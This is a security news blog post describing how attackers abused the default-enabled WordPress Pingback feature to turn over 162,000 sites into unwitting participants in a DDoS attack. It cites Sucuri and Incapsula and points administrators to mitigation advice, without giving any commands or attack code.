Graham CluleyIf you’re a bad guy wanting to blast a website off the internet, the obvious method is to use a distributed denial-of-service (DDoS) attack.
DDoS attacks typically use a botnet of computers in a co-ordinated attack, driving web traffic to a particular site. The victim site can’t cope with the barrage, and – unless properly prepared – falls over.
Many sites would have the same problem if hordes of Justin Bieber fans all clicked on a link he had tweeted at the same time.
But what if you don’t have access to a botnet of compromised computers, or can’t talk Justin Bieber into tweeting a URL of your choosing?
Well, maybe you’ll take advantage of the millions of unsuspecting websites out there running WordPress.
Sucuri has blogged this week about a DDoS attack which brought down a website, after over 162,000 websites running WordPress were all tricked into sending it unwanted traffic.
The attack relied upon Pingbacks – a feature of WordPress that allows a site running WordPress to inform other sites when you write a blog post linking to them.
But the WordPress sites were not hacked or compromised. Instead, through use of a simple UNIX command line, a remote hacker could tell one website to send an HTTP request to the target site, via the Pingback feature.
Pingback is enabled by default on WordPress sites, meaning that the vast majority of websites running the software could probably be recruited into a DDoS attack without their knowledge.
Here’s a natty graphic from the folks at Incapsula, showing how attackers can exploit WordPress’s Pingback feature to launch a DDoS attack.
In a similar attack last year, Incapsula described how hackers had exploited the same trick on approximately 2500 WordPress websites, including ones run by Trend Micro, Gizmodo and Zendesk.
At the time, Incapsula issued a chilling warning:
This gives any attacker a virtually limitless set of IP addresses to Distribute a Denial of Service attack across a network of over 100 million WordPress sites, without having to compromise them.
Clearly things haven’t changed much in the intervening year, and there are still plenty of WordPress sites out there which could be easily recruited into criminal DDoS attacks.
If you administer a self-hosted WordPress site then read Sucuri’s blog for advice on how to best ensure that your website isn’t aiding a DDoS attack.